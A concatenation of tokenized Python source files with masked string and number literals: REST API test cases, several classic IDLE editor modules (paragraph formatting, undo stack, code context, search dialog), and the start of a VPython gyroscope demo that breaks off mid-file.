<EOL> response = self . client . get ( self . good_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( response . 
data [ "<STR_LIT:title>" ] , "<STR_LIT>" ) <EOL> def retrieve_post_error ( self ) : <EOL> response = self . client . get ( self . bad_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def update_post ( self ) : <EOL> self . set_up ( ) <EOL> response = self . client . put ( self . good_url , self . good_data , format = '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( response . data [ "<STR_LIT:content>" ] , self . good_data [ "<STR_LIT:content>" ] ) <EOL> def update_post_error ( self ) : <EOL> response = self . client . put ( self . bad_url , self . good_data , format = '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> self . set_up ( ) <EOL> response = self . client . put ( self . good_url , self . bad_data , format = '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def delete_post ( self ) : <EOL> self . set_up ( ) <EOL> response = self . client . delete ( self . good_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def delete_post_error ( self ) : <EOL> response = self . client . delete ( self . good_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT> ) <EOL> def run_tests ( self , type ) : <EOL> print ( '<STR_LIT>' . format ( type ) ) <EOL> self . generate_api ( type ) <EOL> self . create_post ( ) <EOL> self . create_post_error ( ) <EOL> self . list_post ( ) <EOL> self . retrieve_post ( ) <EOL> self . retrieve_post_error ( ) <EOL> self . update_post ( ) <EOL> self . update_post_error ( ) <EOL> self . delete_post ( ) <EOL> self . delete_post_error ( ) <EOL> class APIViewTest ( BaseTestCase ) : <EOL> def test_apiview ( self ) : <EOL> self . run_tests ( '<STR_LIT>' ) <EOL> class FunctionViewTest ( BaseTestCase ) : <EOL> def test_function ( self ) : <EOL> self . 
run_tests ( '<STR_LIT>' ) <EOL> class ViewSetTest ( BaseTestCase ) : <EOL> def test_viewset ( self ) : <EOL> self . run_tests ( '<STR_LIT>' ) <EOL> class ModelViewSetTest ( BaseTestCase ) : <EOL> def test_modelviewset ( self ) : <EOL> self . run_tests ( '<STR_LIT>' ) <EOL> class EdgeCaseTest ( BaseTestCase ) : <EOL> def test_invalid_format ( self ) : <EOL> try : <EOL> self . generate_api ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> self . assertTrue ( isinstance ( e , CommandError ) ) </s>
import re

from configHandler import idleConf


class FormatParagraph:
    # Menu wiring consumed by the IDLE extension mechanism.
    menudefs = [
        ('<STR_LIT>', [
            ('<STR_LIT>', '<STR_LIT>'),
        ])
    ]

    def __init__(self, editwin):
        # editwin is the owning editor window; only its text widget and
        # selection helpers are used.
        self.editwin = editwin

    def close(self):
        # Drop the editor reference so the window can be garbage collected.
        self.editwin = None

    def format_paragraph_event(self, event):
        # Reformat either the current selection or the paragraph around the
        # insertion point to the configured maximum line width.
        maxformatwidth = int(idleConf.GetOption('<STR_LIT>', '<STR_LIT>', '<STR_LIT>'))
        text = self.editwin.text
        first, last = self.editwin.get_selection_indices()
        if first and last:
            # A selection overrides paragraph detection; no comment prefix
            # handling in that case.
            data = text.get(first, last)
            comment_header = '<STR_LIT>'
        else:
            first, last, comment_header, data = find_paragraph(text, text.index("<STR_LIT>"))
        if comment_header:
            # Strip the comment prefix from every line, reformat the bare
            # text to the remaining width, then re-attach the prefix.
            lines = data.split("<STR_LIT:\n>")
            lines = map(lambda st, l=len(comment_header): st[l:], lines)
            data = "<STR_LIT:\n>".join(lines)
            # Keep at least a minimal usable width even for deep prefixes.
            format_width = max(maxformatwidth - len(comment_header), <NUM_LIT:20>)
            newdata = reformat_paragraph(data, format_width)
            newdata = newdata.split("<STR_LIT:\n>")
            block_suffix = "<STR_LIT>"
            if not newdata[-<NUM_LIT:1>]:
                # Preserve a trailing newline without prefixing an empty line.
                block_suffix = "<STR_LIT:\n>"
                newdata = newdata[:-<NUM_LIT:1>]
            builder = lambda item, prefix=comment_header: prefix + item
            newdata = '<STR_LIT:\n>'.join(map(builder, newdata)) + block_suffix
        else:
            newdata = reformat_paragraph(data, maxformatwidth)
        text.tag_remove("<STR_LIT>", "<STR_LIT:1.0>", "<STR_LIT:end>")
        if newdata != data:
            # Replace the paragraph inside a single undo block so one
            # undo restores the original text.
            text.mark_set("<STR_LIT>", first)
            text.undo_block_start()
            text.delete(first, last)
            text.insert(first, newdata)
            text.undo_block_stop()
        else:
            text.mark_set("<STR_LIT>", last)
        text.see("<STR_LIT>")
        return "<STR_LIT>"


def find_paragraph(text, mark):
    # Locate the paragraph containing Tk index *mark*.
    # Returns (first_index, last_index, comment_header, paragraph_text).
    lineno, col = map(int, mark.split("<STR_LIT:.>"))
    line = text.get("<STR_LIT>" % lineno, "<STR_LIT>" % lineno)
    # Skip blank lines forward to the start of the next paragraph.
    while text.compare("<STR_LIT>" % lineno, "<STR_LIT:<>", "<STR_LIT:end>") and is_all_white(line):
        lineno = lineno + <NUM_LIT:1>
        line = text.get("<STR_LIT>" % lineno, "<STR_LIT>" % lineno)
    first_lineno = lineno
    comment_header = get_comment_header(line)
    comment_header_len = len(comment_header)
    # Extend downward while lines share the same comment prefix and are
    # non-blank once that prefix is ignored.
    while get_comment_header(line) == comment_header and not is_all_white(line[comment_header_len:]):
        lineno = lineno + <NUM_LIT:1>
        line = text.get("<STR_LIT>" % lineno, "<STR_LIT>" % lineno)
    last = "<STR_LIT>" % lineno
    # Extend upward under the same conditions.
    lineno = first_lineno - <NUM_LIT:1>
    line = text.get("<STR_LIT>" % lineno, "<STR_LIT>" % lineno)
    while lineno > <NUM_LIT:0> and get_comment_header(line) == comment_header and not is_all_white(line[comment_header_len:]):
        lineno = lineno - <NUM_LIT:1>
        line = text.get("<STR_LIT>" % lineno, "<STR_LIT>" % lineno)
    first = "<STR_LIT>" % (lineno + <NUM_LIT:1>)
    return first, last, comment_header, text.get(first, last)


def reformat_paragraph(data, limit):
    # Re-wrap *data* so no line exceeds *limit* columns, preserving the
    # first line's indent and using the second line's indent for the rest.
    lines = data.split("<STR_LIT:\n>")
    i = <NUM_LIT:0>
    n = len(lines)
    # Skip leading blank lines; all-blank input is returned unchanged.
    while i < n and is_all_white(lines[i]):
        i = i + <NUM_LIT:1>
    if i >= n:
        return data
    indent1 = get_indent(lines[i])
    if i + <NUM_LIT:1> < n and not is_all_white(lines[i + <NUM_LIT:1>]):
        indent2 = get_indent(lines[i + <NUM_LIT:1>])
    else:
        indent2 = indent1
    new = lines[:i]
    partial = indent1
    while i < n and not is_all_white(lines[i]):
        # Split keeps the whitespace separators at the odd indices;
        # only the even indices are words.
        words = re.split("<STR_LIT>", lines[i])
        for j in range(<NUM_LIT:0>, len(words), <NUM_LIT:2>):
            word = words[j]
            if not word:
                continue
            # expandtabs() measures the on-screen width; never break before
            # the first word of a line (partial == indent1).
            if len((partial + word).expandtabs()) > limit and partial != indent1:
                new.append(partial.rstrip())
                partial = indent2
            partial = partial + word + "<STR_LIT:U+0020>"
            if j + <NUM_LIT:1> < len(words) and words[j + <NUM_LIT:1>] != "<STR_LIT:U+0020>":
                partial = partial + "<STR_LIT:U+0020>"
        i = i + <NUM_LIT:1>
    new.append(partial.rstrip())
    # Carry over everything after the paragraph unchanged.
    new.extend(lines[i:])
    return "<STR_LIT:\n>".join(new)


def is_all_white(line):
    # True when the line consists solely of whitespace (or is empty).
    return re.match(r"<STR_LIT>", line) is not None


def get_indent(line):
    # Return the leading whitespace of the line.
    return re.match(r"<STR_LIT>", line).group()


def get_comment_header(line):
    # Return the line's comment prefix (indent plus comment marker),
    # or the empty string when the line is not a comment.
    m = re.match(r"<STR_LIT>", line)
    if m is None: return "<STR_LIT>"
    return m.group(<NUM_LIT:1>)
import string
from Tkinter import *
from Delegator import Delegator


class UndoDelegator(Delegator):
    """Text-widget delegator that records insert/delete operations as
    Command objects on an undo stack (Python 2 / classic IDLE code)."""

    # Maximum number of commands retained on the undo stack.
    max_undo = <NUM_LIT:1000>

    def __init__(self):
        Delegator.__init__(self)
        self.reset_undo()

    def setdelegate(self, delegate):
        # Re-target the key bindings when the underlying widget changes.
        if self.delegate is not None:
            self.unbind("<STR_LIT>")
            self.unbind("<STR_LIT>")
            self.unbind("<STR_LIT>")
        Delegator.setdelegate(self, delegate)
        if delegate is not None:
            self.bind("<STR_LIT>", self.undo_event)
            self.bind("<STR_LIT>", self.redo_event)
            self.bind("<STR_LIT>", self.dump_event)

    def dump_event(self, event):
        # Debug aid: print the stack around the pointer (Python 2 prints).
        from pprint import pprint
        pprint(self.undolist[:self.pointer])
        print "<STR_LIT>", self.pointer,
        print "<STR_LIT>", self.saved,
        print "<STR_LIT>", self.can_merge,
        print "<STR_LIT>", self.get_saved()
        pprint(self.undolist[self.pointer:])
        return "<STR_LIT>"

    def reset_undo(self):
        """Clear the stack and mark the buffer as saved."""
        self.was_saved = -<NUM_LIT:1>
        self.pointer = <NUM_LIT:0>      # index just past the last applied command
        self.undolist = []
        self.undoblock = <NUM_LIT:0>    # 0 means "not inside an undo block"
        self.set_saved(<NUM_LIT:1>)

    def set_saved(self, flag):
        # saved records the pointer position at save time; -1 means "dirty
        # and unreachable by undo/redo".
        if flag:
            self.saved = self.pointer
        else:
            self.saved = -<NUM_LIT:1>
        self.can_merge = False
        self.check_saved()

    def get_saved(self):
        return self.saved == self.pointer

    saved_change_hook = None

    def set_saved_change_hook(self, hook):
        self.saved_change_hook = hook

    was_saved = -<NUM_LIT:1>

    def check_saved(self):
        # Fire the hook only on saved/dirty transitions.
        is_saved = self.get_saved()
        if is_saved != self.was_saved:
            self.was_saved = is_saved
            if self.saved_change_hook:
                self.saved_change_hook()

    def insert(self, index, chars, tags=None):
        # Intercept widget inserts and route them through the undo stack.
        self.addcmd(InsertCommand(index, chars, tags))

    def delete(self, index1, index2=None):
        self.addcmd(DeleteCommand(index1, index2))

    def undo_block_start(self):
        # Blocks may nest; only the outermost start allocates the sequence.
        if self.undoblock == <NUM_LIT:0>:
            self.undoblock = CommandSequence()
        self.undoblock.bump_depth()

    def undo_block_stop(self):
        if self.undoblock.bump_depth(-<NUM_LIT:1>) == <NUM_LIT:0>:
            # Outermost block closed: push it (or its sole command) onto
            # the stack without re-executing (execute=0 — already done).
            cmd = self.undoblock
            self.undoblock = <NUM_LIT:0>
            if len(cmd) > <NUM_LIT:0>:
                if len(cmd) == <NUM_LIT:1>:
                    cmd = cmd.getcmd(<NUM_LIT:0>)
                self.addcmd(cmd, <NUM_LIT:0>)

    def addcmd(self, cmd, execute=True):
        """Apply *cmd* (unless execute is false) and record it for undo."""
        if execute:
            cmd.do(self.delegate)
        if self.undoblock != <NUM_LIT:0>:
            # Inside a block: accumulate, don't touch the stack yet.
            self.undoblock.append(cmd)
            return
        if self.can_merge and self.pointer > <NUM_LIT:0>:
            # Try to coalesce with the previous command (e.g. typing runs).
            lastcmd = self.undolist[self.pointer - <NUM_LIT:1>]
            if lastcmd.merge(cmd):
                return
        # Truncate any redo tail and append.
        self.undolist[self.pointer:] = [cmd]
        if self.saved > self.pointer:
            # Saved state was in the discarded redo tail: now unreachable.
            self.saved = -<NUM_LIT:1>
        self.pointer = self.pointer + <NUM_LIT:1>
        if len(self.undolist) > self.max_undo:
            # Drop the oldest command; shift bookkeeping indices with it.
            del self.undolist[<NUM_LIT:0>]
            self.pointer = self.pointer - <NUM_LIT:1>
            if self.saved >= <NUM_LIT:0>:
                self.saved = self.saved - <NUM_LIT:1>
        self.can_merge = True
        self.check_saved()

    def undo_event(self, event):
        if self.pointer == <NUM_LIT:0>:
            # Nothing to undo.
            self.bell()
            return "<STR_LIT>"
        cmd = self.undolist[self.pointer - <NUM_LIT:1>]
        cmd.undo(self.delegate)
        self.pointer = self.pointer - <NUM_LIT:1>
        self.can_merge = False
        self.check_saved()
        return "<STR_LIT>"

    def redo_event(self, event):
        if self.pointer >= len(self.undolist):
            # Nothing to redo.
            self.bell()
            return "<STR_LIT>"
        cmd = self.undolist[self.pointer]
        cmd.redo(self.delegate)
        self.pointer = self.pointer + <NUM_LIT:1>
        self.can_merge = False
        self.check_saved()
        return "<STR_LIT>"


class Command:
    """Abstract undoable edit. Subclasses implement do/redo/undo against a
    Text widget and may support merging with a following command."""

    tags = None

    def __init__(self, index1, index2, chars, tags=None):
        self.marks_before = {}
        self.marks_after = {}
        self.index1 = index1
        self.index2 = index2
        self.chars = chars
        if tags:
            self.tags = tags

    def __repr__(self):
        s = self.__class__.__name__
        t = (self.index1, self.index2, self.chars, self.tags)
        if self.tags is None:
            # Omit the tags slot when unset, for terser debug output.
            t = t[:-<NUM_LIT:1>]
        return s + repr(t)

    def do(self, text):
        pass

    def redo(self, text):
        pass

    def undo(self, text):
        pass

    def merge(self, cmd):
        # Default: commands do not merge.
        return <NUM_LIT:0>

    def save_marks(self, text):
        """Snapshot all user marks (two built-in marks are excluded)."""
        marks = {}
        for name in text.mark_names():
            if name != "<STR_LIT>" and name != "<STR_LIT>":
                marks[name] = text.index(name)
        return marks

    def set_marks(self, text, marks):
        """Restore a mark snapshot produced by save_marks."""
        for name, index in marks.items():
            text.mark_set(name, index)


class InsertCommand(Command):
    """Undoable insertion of *chars* at *index1*."""

    def __init__(self, index1, chars, tags=None):
        Command.__init__(self, index1, None, chars, tags)

    def do(self, text):
        self.marks_before = self.save_marks(text)
        # Normalize to a concrete index; clamp past-the-end insertions.
        self.index1 = text.index(self.index1)
        if text.compare(self.index1, "<STR_LIT:>>", "<STR_LIT>"):
            self.index1 = text.index("<STR_LIT>")
        text.insert(self.index1, self.chars, self.tags)
        self.index2 = text.index("<STR_LIT>" % (self.index1, len(self.chars)))
        self.marks_after = self.save_marks(text)

    def redo(self, text):
        text.mark_set('<STR_LIT>', self.index1)
        text.insert(self.index1, self.chars, self.tags)
        self.set_marks(text, self.marks_after)
        text.see('<STR_LIT>')

    def undo(self, text):
        text.mark_set('<STR_LIT>', self.index1)
        text.delete(self.index1, self.index2)
        self.set_marks(text, self.marks_before)
        text.see('<STR_LIT>')

    def merge(self, cmd):
        """Absorb a single-character insertion that directly follows this
        one and is of the same character class (word/newline/other)."""
        if self.__class__ is not cmd.__class__:
            return False
        if self.index2 != cmd.index1:
            return False
        if self.tags != cmd.tags:
            return False
        if len(cmd.chars) != <NUM_LIT:1>:
            return False
        if self.chars and self.classify(self.chars[-<NUM_LIT:1>]) != self.classify(cmd.chars):
            return False
        self.index2 = cmd.index2
        self.chars = self.chars + cmd.chars
        return True

    # Characters treated as "word" characters for merge classification.
    alphanumeric = string.ascii_letters + string.digits + "<STR_LIT:_>"

    def classify(self, c):
        if c in self.alphanumeric:
            return "<STR_LIT>"
        if c == "<STR_LIT:\n>":
            return "<STR_LIT>"
        return "<STR_LIT>"


class DeleteCommand(Command):
    """Undoable deletion of the range [index1, index2)."""

    def __init__(self, index1, index2=None):
        Command.__init__(self, index1, index2, None, None)

    def do(self, text):
        self.marks_before = self.save_marks(text)
        self.index1 = text.index(self.index1)
        if self.index2:
            self.index2 = text.index(self.index2)
        else:
            # No end index: delete a single position after index1.
            self.index2 = text.index(self.index1 + "<STR_LIT>")
        if text.compare(self.index2, "<STR_LIT:>>", "<STR_LIT>"):
            self.index2 = text.index("<STR_LIT>")
        # Remember the deleted characters so undo can restore them.
        self.chars = text.get(self.index1, self.index2)
        text.delete(self.index1, self.index2)
        self.marks_after = self.save_marks(text)

    def redo(self, text):
        text.mark_set('<STR_LIT>', self.index1)
        text.delete(self.index1, self.index2)
        self.set_marks(text, self.marks_after)
        text.see('<STR_LIT>')

    def undo(self, text):
        text.mark_set('<STR_LIT>', self.index1)
        text.insert(self.index1, self.chars)
        self.set_marks(text, self.marks_before)
        text.see('<STR_LIT>')


class CommandSequence(Command):
    """A list of commands undone/redone as a single unit (an undo block)."""

    def __init__(self):
        self.cmds = []
        self.depth = <NUM_LIT:0>   # nesting depth of open undo blocks

    def __repr__(self):
        s = self.__class__.__name__
        strs = []
        for cmd in self.cmds:
            strs.append("<STR_LIT>" % (cmd,))
        return s + "<STR_LIT>" + "<STR_LIT>".join(strs) + "<STR_LIT>"

    def __len__(self):
        return len(self.cmds)

    def append(self, cmd):
        self.cmds.append(cmd)

    def getcmd(self, i):
        return self.cmds[i]

    def redo(self, text):
        for cmd in self.cmds:
            cmd.redo(text)

    def undo(self, text):
        # Undo in reverse order of application.
        cmds = self.cmds[:]
        cmds.reverse()
        for cmd in cmds:
            cmd.undo(text)

    def bump_depth(self, incr=<NUM_LIT:1>):
        self.depth = self.depth + incr
        return self.depth


def main():
    """Manual smoke test: a Text widget percolated through an UndoDelegator."""
    from Percolator import Percolator
    root = Tk()
    root.wm_protocol("<STR_LIT>", root.quit)
    text = Text()
    text.pack()
    text.focus_set()
    p = Percolator(text)
    d = UndoDelegator()
    p.insertfilter(d)
    root.mainloop()


if __name__ == "<STR_LIT:__main__>":
    main()
<s> """<STR_LIT>""" <EOL> import tkinter <EOL> from tkinter . constants import TOP , LEFT , X , W , SUNKEN <EOL> import re <EOL> from sys import maxsize as INFINITY <EOL> from . configHandler import idleConf <EOL> BLOCKOPENERS = set ( [ "<STR_LIT:class>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> UPDATEINTERVAL = <NUM_LIT:100> <EOL> FONTUPDATEINTERVAL = <NUM_LIT:1000> <EOL> getspacesfirstword = lambda s , c = re . compile ( r"<STR_LIT>" ) : c . match ( s ) . groups ( ) <EOL> class CodeContext : <EOL> menudefs = [ ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) ] <EOL> context_depth = idleConf . GetOption ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , type = "<STR_LIT:int>" , default = <NUM_LIT:3> ) <EOL> bgcolor = idleConf . GetOption ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , type = "<STR_LIT:str>" , default = "<STR_LIT>" ) <EOL> fgcolor = idleConf . GetOption ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , type = "<STR_LIT:str>" , default = "<STR_LIT>" ) <EOL> def __init__ ( self , editwin ) : <EOL> self . editwin = editwin <EOL> self . text = editwin . text <EOL> self . textfont = self . text [ "<STR_LIT>" ] <EOL> self . label = None <EOL> self . info = [ ( <NUM_LIT:0> , - <NUM_LIT:1> , "<STR_LIT>" , False ) ] <EOL> self . topvisible = <NUM_LIT:1> <EOL> visible = idleConf . GetOption ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , type = "<STR_LIT:bool>" , default = False ) <EOL> if visible : <EOL> self . toggle_code_context_event ( ) <EOL> self . editwin . setvar ( '<STR_LIT>' , True ) <EOL> self . text . after ( UPDATEINTERVAL , self . timer_event ) <EOL> self . text . after ( FONTUPDATEINTERVAL , self . font_timer_event ) <EOL> def toggle_code_context_event ( self , event = None ) : <EOL> if not self . label : <EOL> widgets = self . editwin . text , self . editwin . 
text_frame <EOL> padx = <NUM_LIT:0> <EOL> for widget in widgets : <EOL> padx += int ( str ( widget . pack_info ( ) [ '<STR_LIT>' ] ) ) <EOL> padx += int ( str ( widget . cget ( '<STR_LIT>' ) ) ) <EOL> border = <NUM_LIT:0> <EOL> for widget in widgets : <EOL> border += int ( str ( widget . cget ( '<STR_LIT>' ) ) ) <EOL> self . label = tkinter . Label ( self . editwin . top , <EOL> text = "<STR_LIT:\n>" * ( self . context_depth - <NUM_LIT:1> ) , <EOL> anchor = W , justify = LEFT , <EOL> font = self . textfont , <EOL> bg = self . bgcolor , fg = self . fgcolor , <EOL> width = <NUM_LIT:1> , <EOL> padx = padx , border = border , <EOL> relief = SUNKEN ) <EOL> self . label . pack ( side = TOP , fill = X , expand = False , <EOL> before = self . editwin . text_frame ) <EOL> else : <EOL> self . label . destroy ( ) <EOL> self . label = None <EOL> idleConf . SetOption ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> str ( self . label is not None ) ) <EOL> idleConf . SaveUserCfgFiles ( ) <EOL> def get_line_info ( self , linenum ) : <EOL> """<STR_LIT>""" <EOL> text = self . text . get ( "<STR_LIT>" % linenum , "<STR_LIT>" % linenum ) <EOL> spaces , firstword = getspacesfirstword ( text ) <EOL> opener = firstword in BLOCKOPENERS and firstword <EOL> if len ( text ) == len ( spaces ) or text [ len ( spaces ) ] == '<STR_LIT:#>' : <EOL> indent = INFINITY <EOL> else : <EOL> indent = len ( spaces ) <EOL> return indent , text , opener <EOL> def get_context ( self , new_topvisible , stopline = <NUM_LIT:1> , stopindent = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> assert stopline > <NUM_LIT:0> <EOL> lines = [ ] <EOL> lastindent = INFINITY <EOL> for linenum in range ( new_topvisible , stopline - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> indent , text , opener = self . 
get_line_info ( linenum ) <EOL> if indent < lastindent : <EOL> lastindent = indent <EOL> if opener in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> lastindent += <NUM_LIT:1> <EOL> if opener and linenum < new_topvisible and indent >= stopindent : <EOL> lines . append ( ( linenum , indent , text , opener ) ) <EOL> if lastindent <= stopindent : <EOL> break <EOL> lines . reverse ( ) <EOL> return lines , lastindent <EOL> def update_code_context ( self ) : <EOL> """<STR_LIT>""" <EOL> new_topvisible = int ( self . text . index ( "<STR_LIT>" ) . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] ) <EOL> if self . topvisible == new_topvisible : <EOL> return <EOL> if self . topvisible < new_topvisible : <EOL> lines , lastindent = self . get_context ( new_topvisible , <EOL> self . topvisible ) <EOL> while self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] >= lastindent : <EOL> del self . info [ - <NUM_LIT:1> ] <EOL> elif self . topvisible > new_topvisible : <EOL> stopindent = self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> while self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] >= new_topvisible : <EOL> stopindent = self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> del self . info [ - <NUM_LIT:1> ] <EOL> lines , lastindent = self . get_context ( new_topvisible , <EOL> self . info [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] + <NUM_LIT:1> , <EOL> stopindent ) <EOL> self . info . extend ( lines ) <EOL> self . topvisible = new_topvisible <EOL> context_strings = [ "<STR_LIT>" ] * max ( <NUM_LIT:0> , self . context_depth - len ( self . info ) ) <EOL> context_strings += [ x [ <NUM_LIT:2> ] for x in self . info [ - self . context_depth : ] ] <EOL> self . label [ "<STR_LIT:text>" ] = '<STR_LIT:\n>' . join ( context_strings ) <EOL> def timer_event ( self ) : <EOL> if self . label : <EOL> self . update_code_context ( ) <EOL> self . text . after ( UPDATEINTERVAL , self . timer_event ) <EOL> def font_timer_event ( self ) : <EOL> newtextfont = self . text [ "<STR_LIT>" ] <EOL> if self . 
label and newtextfont != self . textfont : <EOL> self . textfont = newtextfont <EOL> self . label [ "<STR_LIT>" ] = self . textfont <EOL> self . text . after ( FONTUPDATEINTERVAL , self . font_timer_event ) </s>
<s> from tkinter import * <EOL> class SearchDialogBase : <EOL> title = "<STR_LIT>" <EOL> icon = "<STR_LIT>" <EOL> needwrapbutton = <NUM_LIT:1> <EOL> def __init__ ( self , root , engine ) : <EOL> self . root = root <EOL> self . engine = engine <EOL> self . top = None <EOL> def open ( self , text , searchphrase = None ) : <EOL> self . text = text <EOL> if not self . top : <EOL> self . create_widgets ( ) <EOL> else : <EOL> self . top . deiconify ( ) <EOL> self . top . tkraise ( ) <EOL> if searchphrase : <EOL> self . ent . delete ( <NUM_LIT:0> , "<STR_LIT:end>" ) <EOL> self . ent . insert ( "<STR_LIT:end>" , searchphrase ) <EOL> self . ent . focus_set ( ) <EOL> self . ent . selection_range ( <NUM_LIT:0> , "<STR_LIT:end>" ) <EOL> self . ent . icursor ( <NUM_LIT:0> ) <EOL> self . top . grab_set ( ) <EOL> def close ( self , event = None ) : <EOL> if self . top : <EOL> self . top . grab_release ( ) <EOL> self . top . withdraw ( ) <EOL> def create_widgets ( self ) : <EOL> top = Toplevel ( self . root ) <EOL> top . bind ( "<STR_LIT>" , self . default_command ) <EOL> top . bind ( "<STR_LIT>" , self . close ) <EOL> top . protocol ( "<STR_LIT>" , self . close ) <EOL> top . wm_title ( self . title ) <EOL> top . wm_iconname ( self . icon ) <EOL> self . top = top <EOL> self . row = <NUM_LIT:0> <EOL> self . top . grid_columnconfigure ( <NUM_LIT:0> , pad = <NUM_LIT:2> , weight = <NUM_LIT:0> ) <EOL> self . top . grid_columnconfigure ( <NUM_LIT:1> , pad = <NUM_LIT:2> , minsize = <NUM_LIT:100> , weight = <NUM_LIT:100> ) <EOL> self . create_entries ( ) <EOL> self . create_option_buttons ( ) <EOL> self . create_other_buttons ( ) <EOL> return self . create_command_buttons ( ) <EOL> def make_entry ( self , label , var ) : <EOL> l = Label ( self . top , text = label ) <EOL> l . grid ( row = self . row , column = <NUM_LIT:0> , sticky = "<STR_LIT>" ) <EOL> e = Entry ( self . top , textvariable = var , exportselection = <NUM_LIT:0> ) <EOL> e . grid ( row = self . 
row , column = <NUM_LIT:1> , sticky = "<STR_LIT>" ) <EOL> self . row = self . row + <NUM_LIT:1> <EOL> return e <EOL> def make_frame ( self , labeltext = None ) : <EOL> if labeltext : <EOL> l = Label ( self . top , text = labeltext ) <EOL> l . grid ( row = self . row , column = <NUM_LIT:0> , sticky = "<STR_LIT>" ) <EOL> f = Frame ( self . top ) <EOL> f . grid ( row = self . row , column = <NUM_LIT:1> , columnspan = <NUM_LIT:1> , sticky = "<STR_LIT>" ) <EOL> self . row = self . row + <NUM_LIT:1> <EOL> return f <EOL> def make_button ( self , label , command , isdef = <NUM_LIT:0> ) : <EOL> b = Button ( self . buttonframe , <EOL> text = label , command = command , <EOL> default = isdef and "<STR_LIT>" or "<STR_LIT>" ) <EOL> cols , rows = self . buttonframe . grid_size ( ) <EOL> b . grid ( pady = <NUM_LIT:1> , row = rows , column = <NUM_LIT:0> , sticky = "<STR_LIT>" ) <EOL> self . buttonframe . grid ( rowspan = rows + <NUM_LIT:1> ) <EOL> return b <EOL> def create_entries ( self ) : <EOL> self . ent = self . make_entry ( "<STR_LIT>" , self . engine . patvar ) <EOL> def create_option_buttons ( self ) : <EOL> f = self . make_frame ( "<STR_LIT>" ) <EOL> btn = Checkbutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . revar , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . isre ( ) : <EOL> btn . select ( ) <EOL> btn = Checkbutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . casevar , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . iscase ( ) : <EOL> btn . select ( ) <EOL> btn = Checkbutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . wordvar , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . isword ( ) : <EOL> btn . select ( ) <EOL> if self . 
needwrapbutton : <EOL> btn = Checkbutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . wrapvar , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . iswrap ( ) : <EOL> btn . select ( ) <EOL> def create_other_buttons ( self ) : <EOL> f = self . make_frame ( "<STR_LIT>" ) <EOL> btn = Radiobutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . backvar , value = <NUM_LIT:1> , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if self . engine . isback ( ) : <EOL> btn . select ( ) <EOL> btn = Radiobutton ( f , anchor = "<STR_LIT:w>" , <EOL> variable = self . engine . backvar , value = <NUM_LIT:0> , <EOL> text = "<STR_LIT>" ) <EOL> btn . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" ) <EOL> if not self . engine . isback ( ) : <EOL> btn . select ( ) <EOL> def create_command_buttons ( self ) : <EOL> f = self . buttonframe = Frame ( self . top ) <EOL> f . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:2> , padx = <NUM_LIT:2> , pady = <NUM_LIT:2> , ipadx = <NUM_LIT:2> , ipady = <NUM_LIT:2> ) <EOL> b = self . make_button ( "<STR_LIT>" , self . close ) <EOL> b . lower ( ) </s>
<s> from visual_common . graph import * </s>
from visual import *

# VPython demo: a gyroscope on a pedestal, integrated via Euler angles.
scene.width = <NUM_LIT>
scene.height = <NUM_LIT>
scene.title = '<STR_LIT>'

# Geometry and mass of the gyroscope (units per the masked constants).
Lshaft = <NUM_LIT:1.>            # shaft length
r = Lshaft / <NUM_LIT>          # distance from pivot to center of mass
Rshaft = <NUM_LIT>              # shaft radius
M = <NUM_LIT:1.>                # rotor mass
Rrotor = <NUM_LIT>              # rotor radius
Drotor = <NUM_LIT:0.1>          # rotor thickness
# Principal moments of inertia: I3 about the spin axis (solid disk),
# I1 transverse (parallel-axis shift plus a disk term).
I3 = <NUM_LIT:0.5> * M * Rrotor ** <NUM_LIT:2>
